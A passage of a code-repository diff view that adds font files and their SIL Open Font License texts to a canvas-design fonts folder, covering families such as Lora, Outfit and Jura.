Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Jura-Medium.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Jura-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2019 The Jura Project Authors (https://github.com/ossobuffo/jura)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org

[SIL Open Font License Version 1.1 text, identical to the copy above]
93
skills/canvas-design/canvas-fonts/LibreBaskerville-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2012 The Libre Baskerville Project Authors (https://github.com/impallari/Libre-Baskerville) with Reserved Font Name Libre Baskerville.

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org

[SIL Open Font License Version 1.1 text, identical to the copy above]
BIN
skills/canvas-design/canvas-fonts/LibreBaskerville-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Lora-Bold.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Lora-BoldItalic.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Lora-Italic.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Lora-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2011 The Lora Project Authors (https://github.com/cyrealtype/Lora-Cyrillic), with Reserved Font Name "Lora".

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org

[SIL Open Font License Version 1.1 text, identical to the copy above]
BIN
skills/canvas-design/canvas-fonts/Lora-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/NationalPark-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/NationalPark-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2025 The National Park Project Authors (https://github.com/benhoepner/National-Park)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org

[SIL Open Font License Version 1.1 text, identical to the copy above]
BIN
skills/canvas-design/canvas-fonts/NationalPark-Regular.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/NothingYouCouldDo-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright (c) 2010, Kimberly Geswein (kimberlygeswein.com)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org

-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN
skills/canvas-design/canvas-fonts/NothingYouCouldDo-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/Outfit-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Outfit-OFL.txt
Normal file
@@ -0,0 +1,93 @@
Copyright 2021 The Outfit Project Authors (https://github.com/Outfitio/Outfit-Fonts)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at:
https://openfontlicense.org

-----------------------------------------------------------
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
-----------------------------------------------------------

PREAMBLE
The goals of the Open Font License (OFL) are to stimulate worldwide
development of collaborative font projects, to support the font creation
efforts of academic and linguistic communities, and to provide a free and
open framework in which fonts may be shared and improved in partnership
with others.

The OFL allows the licensed fonts to be used, studied, modified and
redistributed freely as long as they are not sold by themselves. The
fonts, including any derivative works, can be bundled, embedded,
redistributed and/or sold with any software provided that any reserved
names are not used by derivative works. The fonts and derivatives,
however, cannot be released under any other type of license. The
requirement for fonts to remain under this license does not apply
to any document created using the fonts or their derivatives.

DEFINITIONS
"Font Software" refers to the set of files released by the Copyright
Holder(s) under this license and clearly marked as such. This may
include source files, build scripts and documentation.

"Reserved Font Name" refers to any names specified as such after the
copyright statement(s).

"Original Version" refers to the collection of Font Software components as
distributed by the Copyright Holder(s).

"Modified Version" refers to any derivative made by adding to, deleting,
or substituting -- in part or in whole -- any of the components of the
Original Version, by changing formats or by porting the Font Software to a
new environment.

"Author" refers to any designer, engineer, programmer, technical
writer or other person who contributed to the Font Software.

PERMISSION & CONDITIONS
Permission is hereby granted, free of charge, to any person obtaining
a copy of the Font Software, to use, study, copy, merge, embed, modify,
redistribute, and sell modified and unmodified copies of the Font
Software, subject to the following conditions:

1) Neither the Font Software nor any of its individual components,
in Original or Modified Versions, may be sold by itself.

2) Original or Modified Versions of the Font Software may be bundled,
redistributed and/or sold with any software, provided that each copy
contains the above copyright notice and this license. These can be
included either as stand-alone text files, human-readable headers or
in the appropriate machine-readable metadata fields within text or
binary files as long as those fields can be easily viewed by the user.

3) No Modified Version of the Font Software may use the Reserved Font
Name(s) unless explicit written permission is granted by the corresponding
Copyright Holder. This restriction only applies to the primary font name as
presented to the users.

4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
Software shall not be used to promote, endorse or advertise any
Modified Version, except to acknowledge the contribution(s) of the
Copyright Holder(s) and the Author(s) or with their explicit written
permission.

5) The Font Software, modified or unmodified, in part or in whole,
must be distributed entirely under this license, and must not be
distributed under any other license. The requirement for fonts to
remain under this license does not apply to any document created
using the Font Software.

TERMINATION
This license becomes null and void if any of the above conditions are
not met.

DISCLAIMER
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
OTHER DEALINGS IN THE FONT SOFTWARE.
BIN
skills/canvas-design/canvas-fonts/Outfit-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/PixelifySans-Medium.ttf
Normal file
Binary file not shown.
Some files were not shown because too many files have changed in this diff.